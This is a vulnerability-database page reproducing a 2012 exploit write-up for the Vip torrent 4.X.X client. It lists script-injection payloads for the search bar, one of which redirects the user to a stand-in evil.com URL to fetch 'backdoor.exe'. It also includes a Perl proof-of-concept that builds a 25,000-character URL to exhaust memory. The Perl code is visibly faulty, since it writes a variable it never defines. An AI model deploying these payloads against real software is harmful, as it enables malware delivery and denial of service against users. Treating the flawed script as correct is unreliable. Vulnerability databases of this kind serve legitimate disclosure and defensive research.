Vulners
Lucene search
Vip torrent 4.X.X - Multiple Vulnerabilities
#!/usr/bin/perl
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [x] Official Website: http://www.1337day.com 0
# 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
# 0 0
# 1 ========================================== 1
# 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0
# 0 1
# 1 dark-puzzle[at]live[at]fr 0
# 0 ========================================== 1
# 1 White Hat 1
# 0 Independant Pentester 0
# 1 exploit coder/bug researcher 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# Title: Vip torrent 4.X.X - Multiple Vulnerabilities .
# Author : Dark-Puzzle (Souhail Hammou) .
# Date : 19/09/2012 .
# Risk : High
# Type : Local .
# Versions : 4.X.X .
# Tested On : WinXP SP2 FR / Win 7 64bits .
# Gr33tz to : 1nj3ct0r's Team - Exploit-db - Packetstormsecurity - SecurityFocus .
########################################################
# I - JavaScript Code Execution .
########################################################
# The search bar designed for torrent is vulnerable to javascript Code execution . .
# Reason = Using IE . ( Some Remote/Local IE Exploits May Work ) --> FlashObj Exploit Worked with me On IE8 Under Win7 .
# This execution can be executed on a local way or on a remote way .
### go to the search bar : <script> alert(window.location) </script>
### <script> print ('OWn3d') </script> This command uses the printer =) .
### <script> window.location="http://www.evil.com/backdoor.exe" </script>
### <script> alert ('Own3d') </script>
### ...etc
########################################################
# II - Memory Exhaustion Vulnerability
########################################################
# Info : VIP Torrent is prone to a Memory Exhaustion Vulnerability that leads to the raising of CPU Usage to 100% .
# P.S(Overclocked Processor may face some serious problem with this) .
# Usage : perl mem.pl
# Copy the content of mem.txt . Go to File --> Open --> Torrent File --> Add Url --> Then Paste What you copied.
my $http = "\x68\x74\x74\x70\x3A\x2F\x2F" ;
my $mem = "\x41" x 25000 ;
$load= $http.$mem;
open(myfile,'>mem.txt');
print myfile $payload;
close(myfile);
print "\x45\x78\x70\x6C\x6F\x69\x74\x20\x42\x79\x20\x44\x61\x72\x6B\x2D\x50\x75\x7A\x7A\x6C\x65\n";
sleep (3);
print "File Created Successfuly\n";
# 0day.today [2018-04-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Sep 2012 00:00Current
6.8Medium risk
Vulners AI Score6.8